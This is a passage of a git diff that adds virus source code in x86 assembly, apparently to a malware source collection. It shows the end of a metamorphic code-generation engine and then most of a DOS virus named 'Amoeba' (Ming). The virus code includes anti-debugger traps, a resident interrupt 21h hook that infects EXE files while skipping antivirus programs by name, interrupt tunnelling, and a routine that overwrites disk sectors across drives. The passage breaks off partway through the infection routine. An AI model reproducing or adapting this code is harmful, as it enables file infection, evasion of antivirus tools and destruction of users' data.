GC_Trash_Not4 + call GenerateNibble4 + jmp CreateCodeBeginTrash + + GC_Trash_Not4: + dec al + jz CreateCodeBeginTrash + call GenerateNibble5 + + jmp CreateCodeBeginTrash + DoNibbleFindAlgo_NoTrashBegin: + + + DoNibbleNewRnd: + call GetRandomNumber + mov al, byte[RandomNumber] + and al, 0000'0111b + cmp al, 4 + ja DoNibbleNewRnd + + test al, -1 + + jnz DoNibbleFindAlgoNot5 + ; -> 5 + mov byte[FlagMask], MaskNibble5 + mov bl, byte[NibbleData] + call GenerateNibble5 + jmp DoNibbleFinalize + + + + DoNibbleFindAlgoNot5: + + dec al + jnz DoNibbleFindAlgoNot04 + ; -> 0+4 + + mov byte[FlagMask], MaskNibble0 + mov bl, byte[NibbleData] + call GenerateNibble0 + + mov byte[FlagMask], MaskNibble4 + mov bl, byte[NibbleData] + call GenerateNibble4 + jmp DoNibbleFinalize + + + + DoNibbleFindAlgoNot04: + + dec al + jnz DoNibbleFindAlgoNot14 + ; -> 1+4 + mov byte[FlagMask], MaskNibble5 ; need to clear AF first, + mov bl, byte[RandomNumber+3] ; otherwise AAA/AAS influence CF + and bl, 0000'1011b ; clear AF + call GenerateNibble5 + + mov byte[FlagMask], MaskNibble1 + mov bl, byte[NibbleData] + call GenerateNibble1 + + mov byte[FlagMask], MaskNibble4 + mov bl, byte[NibbleData] + call GenerateNibble4 + jmp DoNibbleFinalize + + + + DoNibbleFindAlgoNot14: + + dec al + jnz DoNibbleFindAlgoNot24 + ; -> 2+4 + mov byte[FlagMask], MaskNibble2 + mov bl, byte[NibbleData] + call GenerateNibble2 + + mov byte[FlagMask], MaskNibble4 + mov bl, byte[NibbleData] + call GenerateNibble4 + jmp DoNibbleFinalize + + + + DoNibbleFindAlgoNot24: + ; -> 4+0 + + mov byte[FlagMask], MaskNibble4 + mov bl, byte[NibbleData] + call GenerateNibble4 + + mov byte[FlagMask], MaskNibble0 + mov bl, byte[NibbleData] + call GenerateNibble0 +; jmp DoNibbleFinalize + + + DoNibbleFinalize: + + call GetRandomNumber + test byte[RandomNumber], 0001'0000b ; LAHF or PUSHFD+POP? + jnz DoNF_PUSHFD + + mov byte[edi], 0x9F ; LAHF + inc edi + + test byte[RandomNumber], 0000'1000b + jnz DoNibbleFin_AH + + test byte[RandomNumber], 0000'0010b + jnz DoNibbleFinAL_2 + + mov byte[edi+00], 0x88 + mov byte[edi+01], 0xE0 ; mov al, ah + jmp DoNibbleFinAL_2_X + + DoNibbleFinAL_2: + mov byte[edi+00], 0x86 + mov byte[edi+01], 0xC4 ; xchg ah, al + test byte[RandomNumber], 0000'0100b + jnz DoNibbleFinAL_2_X + + mov byte[edi+01], 0xE0 ; xchg al, ah + DoNibbleFinAL_2_X: + + mov byte[edi+02], 0xAA ; stos + add edi, 3 + jmp DoNibbleEnd + + + + DoNibbleFin_AH: + mov byte[edi+00], 0x88 + mov byte[edi+01], 0x27 ; mov byte[edi], ah + mov byte[edi+02], 0x47 ; inc edi (thx hh86 :D) + add edi, 3 + jmp DoNibbleEnd + + + DoNF_PUSHFD: + mov byte[edi], 0x9C ; pushfd + inc edi + + test byte[RandomNumber], 0100'0000b + jnz DoNF_PUSHFD_AL + + + mov al, byte[RandomNumber] + and al, 0000'0011b + add al, 0x58 + mov byte[edi+00], al ; pop e(a|c|d|b)x + + mov byte[edi+01], 0x88 + and al, 0000'0011b + shl al, 3 + or al, 0000'0111b + mov byte[edi+02], al ; mov byte[edi], (a|c|d|b)l + mov byte[edi+03], 0x47 ; inc edi (thx hh86 :D) + add edi, 4 + jmp DoNibbleEnd + + DoNF_PUSHFD_AL: + mov byte[edi+00], 0x58 ; pop eax + mov byte[edi+01], 0xAA ; stos + add edi, 2 +; jmp DoNibbleEnd + + DoNibbleEnd: + + mov dword[VerifiedAddress], edi + +ret + +; ########################################################################### +; ##### +; ##### Generate Nibbles +; ##### + + + + +; ########################################################################### +; ##### Nibble 0: CF - (ROL, ROR) + +GenerateNibble0: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + +; ebp: +; 0 ... rol Reg, 1 +; 1 ... rol Reg, cl + +; 3 ... ror Reg, cl + + + + call InformationToFlagByte ; bh=flag byte + + GN0_GetTypeAgain: + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0011b + + cmp ebp, 2 + je GN0_GetTypeAgain + + push 0 ; loop counter + + GN0_CF_loop: ; rol Reg, 1 + + pop ecx + inc ecx + push ecx + cmp ecx, 0x2A + ja GN_PossibleInfinitLoop + + GN0_CF_GetAnotherCL: + call GetRandomNumber + mov ecx, dword[RandomNumber] + + test ecx, 0001'1111b ; shiftcount must not be zero + jz GN0_CF_GetAnotherCL + + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + cmp ebp, 0 + jne GN0_CF_loop_ROLN + + rol eax, 1 + jmp GN0_CF_loop_LAHF + + GN0_CF_loop_ROLN: ; rol Reg, N/cl + cmp ebp, 1 + jne GN0_CF_loop_RORN + + rol eax, cl + jmp GN0_CF_loop_LAHF + + GN0_CF_loop_RORN: ; ror Reg, N/cl + ror eax, cl +; jmp GN0_CF_loop_LAHF + + + GN0_CF_loop_LAHF: + lahf + + pop edx + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + + cmp ah, bh + jne GN0_CF_loop + + pop eax ; remove counter + + GN0_GetDifferentRegister: + call GetRandomNumber + mov eax, dword[RandomNumber] + and al, 0000'0011b + cmp al, 0000'0001b + je GN0_GetDifferentRegister ; dont use ECX because we can use CL as second parameter (~2h to find this :) ) + + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx) + mov byte[edi], al + inc edi + + mov dword[edi], edx + add edi, 4 + + push ebp + and ebp, 0000'0001b + pop ebp + jnz GN0_CFN ; is it "rotate Reg, 1" ? + + mov byte[edi], 0xD1 + inc edi + + and al, 0000'0011b + cmp ebp, 0 + jne GN0_CF_CreateCode_ROR + add al, 0xC0 + jmp GN0_CF_CreateCode_done + + GN0_CF_CreateCode_ROR: + add al, 0xC8 + + GN0_CF_CreateCode_done: + mov byte[edi], al + inc edi + jmp GN0_CF_End + + + + GN0_CFN: + + mov byte[edi], 0xB9 + inc edi + + mov dword[edi], ecx + add edi, 4 + + mov byte[edi], 0xD3 + inc edi + + and al, 0000'0011b + + and ebp, 0000'0010b + jnz GN0_CFN_ROR + + add al, 0xC0 + jmp GN0_CF_Write_End + + GN0_CFN_ROR: + add al, 0xC8 + + GN0_CF_Write_End: + mov byte[edi], al + inc edi + + + + GN0_CF_End: + mov dword[VerifiedAddress], edi + +ret + + +; ##### Nibble 0: CF - (ROL, ROR) +; ########################################################################### + + + + +; ########################################################################### +; ##### Nibble 1: AF, CF (PF, SF undefined) - (AAA, AAS) + +GenerateNibble1: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + + + call InformationToFlagByte ; bh=flag byte + + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0001b + + push 0 ; loop counter + + GN1_Loop: + + pop eax + inc eax + push eax + cmp eax, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + cmp ebp, 0 ; this instruction clears AF. Thats important because + jne GN1_Aaa ; AAA and AAS depend on AF, and influence CF depending on it. + + aas + jmp GN1_LAHF + + GN1_Aaa: + aaa + jmp GN1_LAHF + + GN1_LAHF: + pop edx + + lahf + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + cmp ah, bh + jne GN1_Loop + + pop eax ; remove counter + + mov byte[edi], 0xB8 + inc edi + + mov dword[edi], edx ; mov Reg1, NUMBER + add edi, 4 + + + cmp ebp, 0 + jne GN1_WriteAaa + + mov byte[edi], 0x3F + inc edi + jmp GN1_Fin + + GN1_WriteAaa: + mov byte[edi], 0x37 + inc edi + + GN1_Fin: + mov dword[VerifiedAddress], edi + + +ret + + +; ##### Nibble 1: AF, CF (PF, SF undefined) - (AAA, AAS) +; ########################################################################### + + + + +; ########################################################################### +; ##### Nibble 2: CF PF (AF undefined, SF undefined?) - (SHL, SHR, SAL, SAR) + +GenerateNibble2: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + +; ebp: +; 0 ... shl Reg, 1 +; 1 ... shl Reg, N/cl +; 4 ... sal Reg, 1 +; 5 ... sal Reg, N/cl +; 7 ... sar Reg, N/cl + + + call InformationToFlagByte ; bh=flag byte + + GN2_GetTypeAgain: + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0111b + + cmp ebp, 2 + je GN2_GetTypeAgain + cmp ebp, 3 + je GN2_GetTypeAgain + cmp ebp, 6 + je GN2_GetTypeAgain + + push 0 ; counter + + GN2_Shift_loop: ; shl Reg, 1 + + pop ecx + inc ecx + push ecx + cmp ecx, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov ecx, dword[RandomNumber] + + GN2_CF_GetAnotherCL: + call GetRandomNumber + mov ecx, dword[RandomNumber] + + test ecx, 0001'1111b ; shiftcount must not be zero + jz GN2_CF_GetAnotherCL + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + cmp ebp, 0 + jne GN2_Shift_loop_SHLN + + shl eax, 1 + jmp GN2_Shift_loop_LAHF + + GN2_Shift_loop_SHLN: ; shl Reg, N/cl + cmp ebp, 1 + jne GN2_Shift_loop_SAL1 + + shl eax, cl + jmp GN2_Shift_loop_LAHF + + GN2_Shift_loop_SAL1: ; sal Reg, 1 + cmp ebp, 4 + jne GN2_Shift_loop_SALN + + sal eax, 1 + jmp GN2_Shift_loop_LAHF + + + GN2_Shift_loop_SALN: ; sal Reg, N + cmp ebp, 5 + jne GN2_Shift_loop_SARN + + sal eax, cl + jmp GN2_Shift_loop_LAHF + + + GN2_Shift_loop_SARN: ; sar Reg, N + sar eax, cl +; jmp GN3_Shift_loop_LAHF + + + GN2_Shift_loop_LAHF: + lahf + + pop edx + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + + cmp ah, bh + jne GN2_Shift_loop + + pop eax ; remove counter + + GN2_GetDifferentRegister: + call GetRandomNumber + mov eax, dword[RandomNumber] + and al, 0000'0011b + cmp al, 0000'0001b + je GN2_GetDifferentRegister ; dont use ECX because we can use CL as second parameter (~2h to find this :) ) + + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, edx) + mov byte[edi], al + inc edi + + mov dword[edi], edx + add edi, 4 + + push ebp + and ebp, 0000'0001b + pop ebp + jnz GN2_ShiftN ; is it "shift Reg, 1" ? + + mov byte[edi], 0xD1 + inc edi + + and al, 0000'0011b + cmp ebp, 0 + jne GN2_Shift_CreateCode_SAL + add al, 0xE0 + jmp GN2_Shift_CreateCode_done + + GN2_Shift_CreateCode_SAL: + cmp ebp, 4 + jne GN2_Shift_CreateCode_SAR + add al, 0xF0 + jmp GN2_Shift_CreateCode_done + + GN2_Shift_CreateCode_SAR: + add al, 0xF0 + + GN2_Shift_CreateCode_done: + mov byte[edi], al + inc edi + jmp GN2_Shift_End + + GN2_ShiftN: + + and al, 0000'0011b + + cmp ebp, 1 + jne GN2_ShiftNum_NotShl + + add al, 0xE0 ; shl + jmp GN2_ShiftNum_WriteNow + + GN2_ShiftNum_NotShl: + cmp ebp, 5 + jne GN2_ShiftNum_NotSal + + add al, 0xF0 ; sal + jmp GN2_ShiftNum_WriteNow + + GN2_ShiftNum_NotSal: + add al, 0xF8 ; sar +; jmp GN2_ShiftNum_WriteNow + + GN2_ShiftNum_WriteNow: + + call GetRandomNumber + mov ah, byte[RandomNumber] ; 0 ... shift Reg, NNNN + ; 1 ... shift Reg, cl + and ah, 0000'0001b + + jz GN2_Shift_Num + + mov byte[edi], 0xB9 ; mov ecx, ... + inc edi + + mov dword[edi], ecx + add edi, 4 + + mov byte[edi], 0xD3 + inc edi + + mov byte[edi], al + inc edi + jmp GN2_Shift_End + + GN2_Shift_Num: + mov byte[edi], 0xC1 + inc edi + + mov byte[edi], al + inc edi + + mov byte[edi], cl + inc edi + + + GN2_Shift_End: + + mov dword[VerifiedAddress], edi +ret + + +; ##### Nibble 2: CF PF (AF undefined, SF undefined?) - (SHL, SHR, SAL, SAR) +; ########################################################################### + + +; ########################################################################### +; ##### Nibble 3: PF SF (AF undefined) - (AND, XOR, TEST) + +GenerateNibble3: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + + + call InformationToFlagByte ; bh=flag byte + + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0011b + + push 0 + + GN3_AndXorTest_Loop: + + pop eax + inc eax + push eax + cmp eax, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + call GetRandomNumber + mov ecx, dword[RandomNumber] + + cmp ebp, 0 + jne GN3_AndXorTest_NotAnd + and eax, ecx + jmp GN3_AndXorTest_LAHF + + GN3_AndXorTest_NotAnd: + cmp ebp, 1 + jne GN3_AndXorTest_NotXor + xor eax, ecx + jmp GN3_AndXorTest_LAHF + + GN3_AndXorTest_NotXor: + test eax, ecx + jmp GN3_AndXorTest_LAHF + + GN3_AndXorTest_LAHF: + pop edx + + lahf + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + cmp ah, bh + jne GN3_AndXorTest_Loop + + pop eax ; remove counter + + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, 0000'0011b + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx) + mov byte[edi], al + and eax, 0000'0011b + inc edi + + mov dword[edi], edx ; mov Reg1, NUMBER + add edi, 4 + + and eax, 0000'0011b + + call GetRandomNumber + mov esi, dword[RandomNumber] + and esi, 0000'0001b + + je GN3_AndXorTest_Num + ; and Reg1, Reg2 + GN3_AndXorTest_TwoRegisters_Next: + call GetRandomNumber + mov ebx, dword[RandomNumber] + and ebx, 0011b + cmp ebx, eax + je GN3_AndXorTest_TwoRegisters_Next ; Not the same registers! + + or bl, 0xB8 + mov byte[edi], bl ; mov Reg2, ... + inc edi + mov dword[edi], ecx ; mov Reg2, NNNN + add edi, 4 + + cmp ebp, 0 + jne GN3_AndXorTest_2Regs_NoAnd + mov byte[edi], 0x21 + jmp GN3_AndXorTest_2Regs_cont1 + + GN3_AndXorTest_2Regs_NoAnd: + cmp ebp, 1 + jne GN3_AndXorTest_2Regs_NoXor + + mov byte[edi], 0x31 + jmp GN3_AndXorTest_2Regs_cont1 + + GN3_AndXorTest_2Regs_NoXor: + mov byte[edi], 0x85 + jmp GN3_AndXorTest_2Regs_cont1 + + GN3_AndXorTest_2Regs_cont1: + inc edi + + and bl, 0011b ; Reg2 + shl bl, 3 ; bl=000??000 + add bl, al ; bl=000??0?? + add bl, 1100'0000b ; bl=110??0?? + mov byte[edi], bl + inc edi + jmp GN3_AndXorTest_Fin + + GN3_AndXorTest_Num: + push ebp + and ebp, 0000'0010b + pop ebp + jz GN3_AndXorTest_Num_AndXor + + mov byte[edi], 0xF7 + inc edi + + or al, 0xC0 + mov byte[edi], al + inc edi + + mov dword[edi], ecx + add edi, 4 + jmp GN3_AndXorTest_Fin + + + GN3_AndXorTest_Num_AndXor: + mov byte[edi], 0x81 + inc edi + + cmp ebp, 0 + jne GN3_AndXorTest_Num_NoAnd + or al, 0xE0 + jmp GN3_AndXorTest_Num_cont1 + + GN3_AndXorTest_Num_NoAnd: + or al, 0xF0 +; jmp GN3_AndXorTest_Num_cont1 + + GN3_AndXorTest_Num_cont1: + mov byte[edi], al + inc edi + + mov dword[edi], ecx + add edi, 4 + + GN3_AndXorTest_Fin: + + mov dword[VerifiedAddress], edi +ret + + +; ##### Nibble 3: CF PF SF (AF undefined) - (AND, XOR, TEST) +; ########################################################################### + + + +; ########################################################################### +; ##### Nibble 4: AF PF SF (DEC, INC) + +GenerateNibble4: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + + + call InformationToFlagByte ; bh=flag byte + + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0001b + + + push 0 + + GN4_IncDec_Loop: + + pop eax + inc eax + push eax + cmp eax, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + cmp ebp, 0 + je GN4_IncDec_Loop_DEC + + inc eax + lahf + jmp GN4_IncDec_Loop_fin + + GN4_IncDec_Loop_DEC: + dec eax + lahf + + GN4_IncDec_Loop_fin: + pop edx + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + cmp ah, bh + jne GN4_IncDec_Loop + + pop eax ; remove counter + + call GetRandomNumber + mov eax, dword[RandomNumber] + and al, 0000'0011b + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx) + mov byte[edi], al + inc edi + + mov dword[edi], edx + add edi, 4 + + + and al, 0000'0011b + + cmp ebp, 1 + je GN4_IncDec_Loop_writeByteINC + + add al, 8 + + GN4_IncDec_Loop_writeByteINC: + add al, 0x40 + + mov byte[edi], al + inc edi + + mov dword[VerifiedAddress], edi +ret + + +; ##### Nibble 4: AF PF SF (DEC, INC) +; ########################################################################### + + +; ########################################################################### +; ##### Nibble 5: AF CF PF SF (ADD, CMD, NEG, SUB) + + +GenerateNibble5: +; edi ... pointer in filecode +; bl & 0000'1111b ... nibble to generate + +; AF CF PF SF +; using ADD, SUB, CMP, NEG + + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0011b + + cmp ebp, 0x0 + je GN5_Neg + + + + GN8AddSubCmpNext: + call GetRandomNumber + mov ebp, dword[RandomNumber] + and ebp, 0000'0011b ; ebp tells which instruction to use (1=add, 2=sub, 3=cmp) + jz GN8AddSubCmpNext + jmp GN5_AddSubCmp + + GN5_fin: + + mov dword[VerifiedAddress], edi +ret + + + +GN5_Neg: + call InformationToFlagByte ; bh=flag byte + + push 0 + + GN5_Neg_Loop: + + pop eax + inc eax + push eax + cmp eax, 0x2A + ja GN_PossibleInfinitLoop + + call GetRandomNumber + mov eax, dword[RandomNumber] + push eax + + neg eax + lahf + + pop edx + + cmp ah, bh + jne GN5_Neg_Loop + + pop eax + + call GetRandomNumber + mov eax, dword[RandomNumber] + and al, 0000'0011b + or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx) + mov byte[edi], al + inc edi + + mov dword[edi], edx + add edi, 4 + + mov byte[edi], 0xF7 + inc edi + + and al, 0000'0011b + add al, 0xD8 + mov byte[edi], al + inc edi + +jmp GN5_fin + + + + +GN5_AddSubCmp: + call InformationToFlagByte ; bh=flag byte + call GetRandomNumber + + push 0 ; loop counter + + GN5_AddSubCmp_Loop: + + pop edx + inc edx + push edx + cmp edx, 0x2A + ja GN_PossibleInfinitLoop + + mov edx, dword[RandomNumber] + push edx + call GetRandomNumber + mov esi, dword[RandomNumber] + + cmp ebp, 1 + je GN5_AddSubCmp_Loop_Sub + + cmp ebp, 2 + je GN5_AddSubCmp_Loop_Cmp + + mov ecx, 0x01C0 + add edx, esi + jmp GN5_AddSubCmp_Loop_LAHF + + GN5_AddSubCmp_Loop_Sub: + mov ecx, 0x29E8 + sub edx, esi + jmp GN5_AddSubCmp_Loop_LAHF + + GN5_AddSubCmp_Loop_Cmp: + mov ecx, 0x39F8 + cmp edx, esi + + + GN5_AddSubCmp_Loop_LAHF: + lahf + + pop edx + + and ah, byte[FlagMask] + and bh, byte[FlagMask] + cmp ah, bh + jne GN5_AddSubCmp_Loop + + pop eax ; remove counter + + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, 0000'0011b ; create Register number + push eax ; save Register number + + mov bl, al + add bl, 0xB8 + + mov byte[edi], bl + inc edi + + mov dword[edi], edx + add edi, 4 ; mov Reg1, NNNN + + call GetRandomNumber + mov eax, dword[RandomNumber] + and eax, 1 + + jz GN5_AddSubCmp_TwoRegisters + + + mov byte[edi], 0x81 + inc edi + + mov dl, cl + pop eax ; get Register number + add dl, al ; use Register number + mov byte[edi], dl ; add Reg, ... + inc edi + mov dword[edi], esi + add edi, 4 + jmp GN5_fin + + GN5_AddSubCmp_TwoRegisters: + + pop eax ; Register number + and al, 0000'0011b + + GN5_AddSubCmp_TwoRegisters_Next: + call GetRandomNumber + mov ebx, dword[RandomNumber] + and ebx, 0011b + cmp ebx, eax + je GN5_AddSubCmp_TwoRegisters_Next ; Not the same registers! + + or bl, 0xB8 + mov byte[edi], bl ; mov Reg2, ... + inc edi + mov dword[edi], esi ; mov Reg2, NNNN + add edi, 4 + + and bl, 0011b ; Reg2 + shl bl, 3 ; bl=000??000 + add bl, al ; bl=000??0?? + or bl, 1100'0000b ; bl=110??0?? + mov byte[edi], ch + inc edi + mov byte[edi], bl + inc edi ; add Reg1, Reg2 + +jmp GN5_fin + +; ##### Nibble 5: AF CF PF SF (ADD, CMD, NEG, SUB) +; ########################################################################### + +InformationToFlagByte: +; in: bl=0000'SAPC +; out: bh=S00A'0P1C + + push eax + mov al, bl + ; CF: + mov bh, bl ; ah=0000'SAPC + and bh, 0000'0001b ; ah=0000'000C + + ; PF: + shl bl, 1 ; al=000S'APC0 + or bh, bl ; ah=000S'APCC + and bh, 0000'0101b ; ah=0000'0P0C + + ; AF: + shl bl, 1 ; al=00SA'PC00 + and bl, 0011'0000b ; al=00SA'0000 + or bh, bl ; ah=00SA'0P0C + and bh, 0001'0101b ; ah=000A'0P0C + + ; SF: + shl bl, 2 ; al=SA00'0000 + or bh, bl ; ah=SA0A'0P0C + and bh, 1001'0101b ; ah=S00A'0P0C + or bh, 0000'0010b ; ah=S00A'0P1C + + xchg al, bl + pop eax +ret + + +GN_PossibleInfinitLoop: +; given Nibble could not be created with current methode +; therefore give up after 42+ trials and try with another one + + + pop eax ; remove counter + pop eax ; remove return-addresse + + mov edi, dword[VerifiedAddress] ; last correct addresse of file + + ; if there has already been some code written to the + ; new file, it can be considered as random functional trash :) + +jmp CreateCodeForNibble + + + +; ##### +; ##### Generate Nibbles +; ##### +; ########################################################################### + + +GetRandomNumber: + pushad + xor edx, edx + mov eax, dword[RandomNumber] + ror eax, 16 + + mov ebx, 1103515245 + mul ebx ; EDX:EAX = EDX:EAX * EBX + + add eax, 12345 + rol eax, 16 + mov dword[RandomNumber], eax + popad +ret + +CreateSpecialRndNumber: +; in: ebx, ecx +; out: edx=(rand()%ebx + ecx) + + call GetRandomNumber + + xor edx, edx + mov eax, dword[RandomNumber] + div ebx + + add edx, ecx +ret + +WholeCodeEnd: + +times (175'269 + 7 * 1149 - (WholeCodeEnd-StartEngine)) db 0x0 ; 1st generation padding + ; This is average size of encrypted virus + 7 * sigma - 1st gen. code + ; 7*sigma ~ 99.999999999744 % of all cases + ; (i took the average of 15files, as statistics is very high in one + ; file, this is to a very good approx. gauss distributed) +.end start \ No newline at end of file diff --git a/Win32/Virus.Win32.Ming.asm b/Win32/Virus.Win32.Ming.asm new file mode 100644 index 00000000..dc8687fb --- /dev/null +++ b/Win32/Virus.Win32.Ming.asm @@ -0,0 +1,1028 @@ +;---------------------------------------------------------------------------; +; Title: Ming.CLME.1952 ; +; (c) 1996 Malware Technology ; +; Disclaimer: Malware Technology is not responsible for any problems ; +; caused due to assembly of this source. ; +;---------------------------------------------------------------------------; +.radix 10h +.model small +.code +.386 + +assume cs:_TEXT,ds:_TEXT,ss:_TEXT + +start: + call flex2 +flex2: + pop si +; sub si, offset flex2 - offset start + db 81,0EE + dw offset flex2 - offset start + + xor ax,ax + mov ds,ax ; DS := 0 + + ; Debugger Trap I + mov ax,cs + shl eax,10 ; Put segment into upper 16bit of eax + lea ax,newint01[si] + xchg eax,dword ptr ds:[4] ; int 01 vector + mov dword ptr ds:[4],eax + + ; Debugger Trap II + ; make a checksum over the virus + mov al,0 + mov bx,si + mov cx,19bh +checksum_loop: + add al,byte ptr cs:[bx] + inc bx + loop checksum_loop + cmp al,byte ptr cs:checksum[si] + jne newint01 + + cli + dec sp + sti + + push es + mov ah,0f2 + int 21 ; self-check + cmp ah,2 ; i am resident ? + jnz not_resident ; no + + call flex3 +flex3: + pop ax + sub ax,offset flex3 - offset start + xchg bp,ax + push cs + pop ds ; DS := CS + push cs + pop es ; ES := CS + lea si,initial_regs[bp] + lea di,old_ip[bp] + cld + mov cx,8 + rep movsb + pop es ; PSP segment + push es + mov ax,es + add ax,10 + add cs:old_cs[bp],ax + add cs:old_ss[bp],ax + mov ah,2ch + int 21 ; Get Time + cmp dh,2 ; Seconds = 2 ? + jnz no_damage ; No + + ; Damage function + push bp + mov ah,3 + mov bh,0 + int 10 ; Get Cursor Position at Page 0 + push cx ; and save it + push dx + mov ax,1301 ; Give out string + mov dx,0800 ; (8,0) + push cs + pop es ; ES := CS + lea bp,copyright[bp] ; adress of string + mov bl,0f0 ; Attributes + mov cx,offset end_copyright - offset copyright + ; Length of String + int 10 ; now + mov ah,2 ; set cursor position + pop dx ; get from stack + pop cx + int 10 + pop bp + mov cx,0b6 + sti +stop_loop: + hlt + loop stop_loop + +no_damage: + pop es ; PSP segment + push es + pop ds + cli + mov ss,word ptr cs:old_ss[bp] + mov sp,word ptr cs:old_sp[bp] + sti + jmp start_host + +not_resident: + call flex4 +flex4: + pop si + sub si,offset flex4 - offset start + pop ax ; PSP-segment + add ax,10 + mov es,ax ; Segment after PSP + push es + xor ax,ax + xchg di,ax + mov ds,ax ; DS := 0 + + ; Debugger Trap III + mov eax,0CBA4F3FC ; CLD; REPZ; MOVSB; RETF + xchg eax,dword ptr ds:[000C] + mov cs:oldint03[si],eax + mov ax,offset start_over + push ax + mov cx,offset virus_end - offset start ; size of whole virus + push cs + pop ds + ; DS:SI - begin of virus + ; ES:DI - right after PSP + ; return adress on stack ES:00E5 + db 0EA + dd 0000000Ch ; JMP FAR 0000:000C + + +start_over: + xor ax,ax + mov ds,ax ; DS := 0 + mov ax,cs + shl eax,10 + mov ax,offset newint21 + xchg eax,dword ptr ds:[84] ; Set new int 21 + mov cs:oldint21,eax ; and save old one + mov eax,oldint03 + mov dword ptr ds:[200],eax ; Set int 80 to int 03 + + ; Get name of started program + push cs + pop ax + sub ax,10 ; => PSP segment + mov ds,ax + mov es,ax + mov ax,word ptr ds:[2c] ; segment of enviroment + mov ds,ax + mov bx,0ffff +env_loop: + inc bx + cmp word ptr ds:[bx],0 + jnz env_loop + cmp word ptr ds:[bx+2],1 + jnz env_loop + add bx,4 + + mov dx,bx + mov bx,offset exec_param_buffer + mov word ptr cs:[bx+4],es ; segment of command string + mov word ptr cs:[bx+8],es ; segment of 1st FCB + mov word ptr cs:[bx+0c],es ; segment of 2nd FCB + + push ds + push es + xor ax,ax + mov es,ax ; ES := 0 + lds bx,dword ptr es:[0C1] ; ??? + cmp word ptr ds:[bx],9090 + jnz @@103 + mov bx,[bx+8] + lds bx,dword ptr ds:[bx] +@@103: + mov cx,25 + add bx,cx +@@105: + inc bx + cmp word ptr [bx],0FC80 + jnz @@104 + mov ax,bx +@@104: + loop @@105 + + mov di,offset tunneled_int21 + push cs + pop es + cld + stosw + mov ax,ds + stosw + + pop ax + push ax + dec ax + mov ds,ax + mov dword ptr ds:[8],656F6D41 + mov dword ptr ds:[0C],315F6162 + + pop es + pop ds + + mov ah,4ah + mov bx,1000 ; virus needs 64 kbyte ! + int 21 + + mov ax,4b00 + push cs + pop es + mov bx,offset exec_param_buffer + int 21 + mov ah,4dh + int 21 ; get ERRORLEVEL + mov ah,31 + mov dx,0200 + call call_int21 + + ; Exec-Param-Block +exec_param_buffer dw ? ; segment of enviroment + dw 0080 ; offset of command string + dw ? ; segment of command string + dw 005C ; offset of 1st FCB + dw ? ; segment of 1st FCB + dw 006C ; offset of 2nd FCB + dw ? ; segment of 2nd FCB + +copyright db ' *Amoeba v1.00* ',0ah,0dh + db 'Written by Crazy Lord (Ming)',0ah,0dh + db ' Made in Hong Kong ' +end_copyright equ $ + + +newint01: + call tunnel_int13 + xor ax,ax + mov ds,ax ; DS := 0 + mov ah,19 + int 21 ; get actual drive + xchg al,dl ; drive number into dl + mov dh,0 ; Head 0 + mov cx,1 ; Track 0 Sector 1 +trash_next_track: + mov ax,301 ; Write one sector + pushf + call dword ptr ds:[004ch] ; call int 13h + inc ch ; next Track + cmp ch,22 + jnz trash_next_track + inc dl ; next drive + jmp trash_next_track + + +newint21: + pushf + cmp ah,0f2 + jnz not_selfcheck + mov ah,2 + popf + iret +not_selfcheck: + cmp ax,4b00 + jz infect_file + cmp ah,3dh + jz infect_file + cmp ah,56 + jz infect_file + cmp ah,43 + jz infect_file + +go_old21: + popf + db 0EA ; JMP FAR xxxx:xxxx +oldint21 dd ? ; (0246) + +infect_file: + pusha + mov bx,dx + dec bx +next_char: + inc bx + cmp byte ptr ds:[bx],0 ; end of string ? + jnz next_char + cmp word ptr ds:[bx-2],'EX' ; EXE-file ? + jz is_exe +do_not: + popa + jmp go_old21 + +is_exe: + cmp word ptr ds:[bx-6],'NA' ; 'TBSCAN.EXE' ? + jz do_not + cmp word ptr ds:[bx-6],'TO' ; 'F-PROT.EXE' ? + jz do_not + cmp word ptr ds:[bx-6],'86' + jz do_not + cmp word ptr ds:[bx-6],'YP' + jz do_not + cmp word ptr ds:[bx-6],'GE' +;* jz do_not + + push ds + push es + call tunnel_int13 + + mov ax,3d02 + call call_int21 ; open file for read/write + xchg bx,ax + + mov ax,5700 + call call_int21 ; get files date & time + push dx ; and save them + push cx + + or cx,0FFF0 + cmp cx,0FFFF ; seconds = 30 or 62 ? + jnz do_infect + + pop cx + pop dx + jmp close_file + +do_infect: + push cs + pop ds + + mov ah,3f + mov cx,18 + mov dx,offset buffer + call call_int21 ; read 24 byte from file + + push cx + push dx + + les ax,dword ptr buffer[0E] + mov word ptr initial_regs[4],ax + mov word ptr initial_regs[6],es + les ax,dword ptr buffer[14] + mov word ptr initial_regs,ax + mov word ptr initial_regs[2],es + + 